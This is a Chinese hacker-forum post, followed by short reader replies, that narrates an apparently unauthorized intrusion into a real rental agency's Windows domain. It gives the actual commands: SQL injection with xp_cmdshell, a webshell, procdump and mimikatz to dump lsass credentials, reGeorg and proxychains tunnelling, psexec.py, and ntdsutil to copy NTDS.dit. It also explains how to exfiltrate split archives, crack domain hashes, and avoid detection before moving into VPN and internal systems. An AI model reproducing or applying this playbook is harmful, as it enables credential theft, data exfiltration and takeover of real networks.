【小明渗透日记】小明要租房
响应90大大的号召。。。。这文章原本是发在90sec的,现在挪到ihonker
201x年12月10日 星期二 天气晴 宜搞站禁约炮
我是小明,小鸡那日了狗的拉我到xx搬砖,工地不给住宿,于是小明要租房,东走走西找找,花花花两天过去了,累成了狗,无赖之下找到xx中介,3000大洋中介费,我滴那个娘啊!看见他宣传单下角的网址,默默交了钱拿着宣传单回了家。
0x01 引言
渗透、搞站、日网在相关书籍当中基本没有说关于渗透理论的知识,书籍中基本都是工具的使用+各种小方法和小技巧,很多公式性的东西都是大家常年搞站和朋友一起交流出的结果。在渗透中“渗透3通道”是总结出的一个特别好的结论。(ps:一定是我不喜欢看书)
渗透3通道:命令执行通道(渗透路线)、文件传输通道(大量数据拖取)、权限控制通道(木马后门控制战果)
本文只通过小明实际案例说下命令执行通道,其他的请期待以后的小明渗透日记。
0x02 命令传输通道模型
这个是目前最好使用的命令传输通道(当时里面也有很多坑,在特定环境还需细微改动),在以前很多老文章中会出现的老工具如:hd、lcx、xsocks、ssock、reDuh等等都不是太好用。
0x03 寻找网络边界短板
二级域名测试、旁站测试、c段测试是常用的是手法,不知道大家还记不记得我在《【小明渗透日记】追寻女神》中说到过关于网站业务和功能分析,我们可以通过寻找业务关联网站和新业务网站(最新的和最老的往往是出现漏洞几率比较高的地方)。
通过查询目标各种广告和宣传,找到了近期的几个活动,不负众望,sqlerver 2008 sa权限注入,此过程不详述,都懂的windows2008+asp.net+sqlserver2008 构架的网站。sa权限注入,开xp_cmdshell,system权限,全程无尿点,但也遇到了坑,加不了账户360拦截着,于是用xp_cmdshell echo了菜刀一句话,找到sa密码用菜刀链接数据库,使用xp_cmdshell执行命令,使用
procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp
dump lsass.exe内存回来,然后本地使用:
mimikatz # sekurlsa::minidump SUPERCOMPUTER_lsass.dmp
mimikatz # sekurlsa::logonPasswords full
抓取明文,在搞其他目标的时候遇到相同的构架其实也遇到了其他很多坑,比如开不了xp_cmdshell、加不了账户、有安全产品拦截等等,这只能靠自己平时积累了,没有哪一种办法是万能的。
现在我们找到了突破口,一个ipconfig /all 跳出来了域,是一个域环境中的机器,幸运的是明文抓到了域控账号(其实也是情理之中的,因为我们搞的是新活动,管理员还在调试,肯定经常登录这台机器,这也算搞新活动的一个优点吧)
通过DNS初步确定了172.13.x.x是域控,下一步就该上域控拖东西了。关于什么域探测啊之类的文章多的很不累诉。
0x03 搭建命令传输通道
1.reGeorg:Http socks5工具
下载地址:https://github.com/sensepost/reGeorg
使用:目标是.net的于是传文件中的tunnel.aspx上网站目录,然后本地执行
-p参数:指定socks5端口
-l参数:执行本地地址默认为127.0.0.1,最好使用-l参数改成0.0.0.0,这样很好的使用proxifier在windows上连接
2.proxychain和proxifier
在kali下修改/etc/proxychains.conf 之中
直接修改sock4 127.0.0.1 9090 为 sock5 127.0.0.1 8090
使用:proxychains 工具 工具参数
3.windows下使用proxifier
下载:百度各种破解版
配置:结合我们上边reGeorg工具开的socks5,由于我们使用的是0.0.0.0,我们可以在windows上连接。我kali虚拟机ip为192.168.56.131
工具栏profile-->proxy servers-->add
工具栏profile-->proxification rules 修改default策略的action栏为direct。好了各种ok。
使用:我如我们想哪一个工具使用代理就直接右键-->profixier-->你自己配置的proxy,我使用mstsc.exe连接域控
4.psexec.py
这个工具让我们很好的有一个命令行去控制目标,为什么是py的呢?为什么不用psexec.exe,大牛告诉我psexec.exe是会在目标上建服务并且退出的时候不会删除的,所以还是psexec.py或者有个wmi版本的也可以。
下载:https://github.com/nick-o/impacket(psexec.py是impacket包中的东西,里面还有其他有意思的东西)
使用:下载好后先安装python setup.py install,
python pyexec.py administrator:password@127.0.0.1 cmd
ssh和scp为目标机为linux的时候使用,由于此次目标为windows域,在此不多说。
命令传输通道搭建玩了,我们可以尽情的使用本地linux和windows上的任何工具,再说下里面的坑:
坑1:使用reGeorg时候,由于目标的脚本环境各种不同,reGeorg可能会报错,需要自己修改个别地方使用,成功率:jsp>.net>php
坑2:管理员在线的时候最好别上,使用psexec.py,在进程中可以看见一个随机数组成的进程名,一看就是有问题,所以搞站还得月黑风高
如看官还遇见过其他的坑,请指导
0x04 拖域成员
这篇文章中介绍了两种拖域成员的方法《windows server 2012 用户hash抓取方法研究(本地 域)》,本地搭建的环境和实际环境还是有很大差距的,里面有一些坑,需要自己填。
我只说下我在本次渗透测试中成功的方法,不一定代表你在你目标中也能成功。
ntdsutil.exe + QuarksPwDump.exe 是一个坑如果你导出的ntds.dit文件太大QuarksPwDump.exe 要报内存不足的错误(本地测试这个方法没有问题是因为你的ntds.dit文件太小(这个也是我猜测原因),实际情况中ntds.dit一般都有几个G),所以我使用的是ntsutil.exe +PWPR(Passcape Windows Password Recovery)。
1.ntdsutil导出ntds.dit和system,使用《windows server 2012 用户hash抓取方法研究(本地 域)》中方法是没有问题的
#ntdsutil
#snapshot
#activate instance ntds
#create
#mount {GUID}
copy c:\{挂载点}\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit (可手动复制)(新窗口复制)
copy c:\{挂载点}\WINDOWS\system32\config\system c:\system
#unmount {GUID}
#delete {GUID}
#quit
#quit 2.PWPR(Passcape Windows Password Recovery)
这个是一个收费软件(虽然有demo版本,但是不好用),破解版下载:http://www.ttrar.com/html/Passca ... overy-Advanced.html
这个工具很强大,看官自己摸索,我只说下解域密码
里面有gpu破解,很快跑出来了
说下当我导出ntds.dit和system是怎么拖回来的,nsds.dit有2G,首先用rar分块打包(每块大小看自己网络环境),用资源共享net use,把它们传到web服务器的web目录下(这个步骤是内网比较快),然后使用迅雷或者什么百度云盘等各种云盘,给下载回来(自己网速不好就先离线)。这个过程有2个坑:
坑1:打包一定要加密,太大必须分块,apache最大文件下载支持2G(亲身受害过),所以别被掉坑了
坑2:一定要观察下网络中有没有什么流量监控设备(尼玛有一次下着下着就被发现了,打包后8个多G的邮件啊)
0x05 辛苦的后渗透阶段
东西拖回来了,也解密了,我一直没说拖的域是什么域,其实是员工域,你懂的。得到了80%(有些没破解出来,nt hash 你懂不是lm hash)的员工账号密码。接下来就是累死人的阶段。
邮件、vpn、各种内部系统, 怎么翻邮件已经在《【小明渗透日记】追寻女神》说过了。说下vpn,vpn在国内企业使用量最多的应该是深信服的sslvpn了,目标也是用的此种,登vpn有许多的坑。
深信服sslvpn版本多,遇到好多种版本了,并且这样sslvpn用ie最好用,进去后的界面差距很大(功能设定上的),有点是直接给你几个按钮,你点击进入内部系统,有点是直接显示你能够访问的ip段或指定ip的指定端口,还有的进去是给你一个虚拟化桌面(你懂的,虚拟化桌面类似终端机,使用终端机绕过手法,进去使用此台机器做跳板)。然后就是登录vpn要多登录,可能你登录几个都没有权限(最开始我sb觉得是他vpn有问题,怎么进去不能用),多登录找到有权限的。
各种内部系统,内部系统就多了,可以从vpn中发现很多内部系统,有3种系统是非常重要的:运维系统、文件共享系统、存储系统(有次遇到netapp,尼玛真是长见识了)。
比如此次目标找到了运维系统,你懂的帐号密码拓扑图一大堆,基本就完整控制了全部网络,运维手册简直就是渗透路线指导书。
0x06 总结
搞完之后,最后发现,尼玛有意义么?没意义!什么也没干,来也匆匆去也匆匆,继续交房租继续板砖。 沙发 看了 没懂 求详解 没能看懂,自己的技术太渣渣了 高手高手高高手! 学习学习技术,加油! 加油!干倒冰儿和酒仙! 支持中国红客联盟(ihonker.org) 支持中国红客联盟(ihonker.org)